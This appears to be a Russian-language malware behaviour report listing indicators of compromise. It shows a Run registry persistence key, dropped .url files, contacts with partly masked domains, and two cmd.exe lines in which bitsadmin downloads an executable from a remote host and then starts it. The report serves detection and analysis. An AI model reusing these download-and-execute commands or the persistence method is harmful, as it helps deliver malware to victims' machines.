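Техническая информация (часть символов в доменных именах скрыта знаками «#», поэтому эти записи непригодны для точного сопоставления)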
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'VolID' = '%APPDATA%\VolID.url'
- %APPDATA%\VolID.url
- %APPDATA%\iplog.url
- 'localhost':1037
- 'so##rm.com':80
- 'ma##r.info':443
- http://so##rm.com/
- DNS ASK so##rm.com
- DNS ASK ma##r.info
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- '<SYSTEM32>\cmd.exe' /k bitsadmin /transfer ringtone http://3r####lisher.com/start.exe %userprofile%\VolID.exe&timeout 40&start %userprofile%\VolID.exe&Exit 5
- '<SYSTEM32>\cmd.exe' /k bitsadmin /transfer ringtone http://re##.life/TI9J1Lvns1.exe %userprofile%\home.exe&timeout 40&start %userprofile%\home.exe&Exit 5
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -Embedding